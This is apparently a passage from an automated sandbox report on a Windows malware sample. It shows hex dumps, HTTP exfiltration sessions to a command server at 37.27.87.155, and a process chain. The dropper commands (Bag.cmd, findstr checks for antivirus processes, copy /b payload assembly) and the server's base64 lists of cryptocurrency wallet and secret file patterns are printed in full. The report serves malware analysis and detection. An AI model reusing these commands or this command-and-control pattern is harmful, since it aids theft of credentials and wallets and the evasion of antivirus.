2024-04-30 05:44:25 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-04-30 05:44:25 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-04-30 05:44:26 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-04-30 05:44:26 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-04-30 05:44:26 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.8	49725	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:27 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:27 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 41 45 48 43 42 47 49 49 4a 4a 4a 4a 4b 4b 4b 45 48 0d 0a 43 6f 6e 74 Data Ascii: ------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------DGDAEHCBGIIJJJJKKKEHContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------DGDAEHCBGIIJJJJKKKEHCont
2024-04-30 05:44:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:27 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.8	49726	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:28 UTC	261	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFHIEGDHJKECAAKKE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 0d 0a 43 6f 6e 74 Data Ascii: ------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------DBKKFHIEGDHJKECAAKKEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------DBKKFHIEGDHJKECAAKKECont
2024-04-30 05:44:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:29 UTC	2208	IN	Data Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.8	49727	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:32 UTC	263	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGCFBFBGHDGDAKECAKJE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 61029 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:32 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 42 46 42 47 48 44 47 44 41 4b 45 43 41 4b 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------CGCFBFBGHDGDAKECAKJEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------CGCFBFBGHDGDAKECAKJECont
2024-04-30 05:44:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-04-30 05:44:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-04-30 05:44:32 UTC	11964	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-04-30 05:44:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49728	37.27.87.155	443	752	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-30 05:44:33 UTC	262	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHIDHCBGDHJKEBGDGIJE User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 37.27.87.155 Content-Length: 7005 Connection: Keep-Alive Cache-Control: no-cache
2024-04-30 05:44:33 UTC	7005	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 32 66 62 37 36 65 33 37 36 61 65 31 64 37 64 65 30 35 38 30 31 61 33 65 64 35 36 62 35 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 36 62 62 35 34 61 66 62 33 63 37 66 31 35 64 38 38 61 38 36 66 61 38 36 36 37 65 38 31 66 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 47 44 47 49 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------GHIDHCBGDHJKEBGDGIJEContent-Disposition: form-data; name="token"52fb76e376ae1d7de05801a3ed56b5bd------GHIDHCBGDHJKEBGDGIJEContent-Disposition: form-data; name="build_id"86bb54afb3c7f15d88a86fa8667e81f9------GHIDHCBGDHJKEBGDGIJECont
2024-04-30 05:44:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 30 Apr 2024 05:44:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-04-30 05:44:34 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Target ID:	0
Start time:	07:42:25
Start date:	30/04/2024
Path:	C:\Users\user\Desktop\0dN59ZIkEM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0dN59ZIkEM.exe"
Imagebase:	0x400000
File size:	819'026 bytes
MD5 hash:	1A6E4128750535604181321CE27C3084
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:42:26
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:42:28
Start date:	30/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:42:30
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:42:30
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa.exe opssvc.exe"
Imagebase:	0x870000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:42:31
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xa40000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:42:31
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
Imagebase:	0x870000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:42:31
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 1151
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:42:31
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "NickelTruckWritersBattery" Mattress
Imagebase:	0x870000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:42:31
Start date:	30/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:42:31
Start date:	30/04/2024
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif
Wow64 process (32bit):	true
Commandline:	1151\Spice.pif 1151\a
Imagebase:	0xe70000
File size:	893'608 bytes
MD5 hash:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
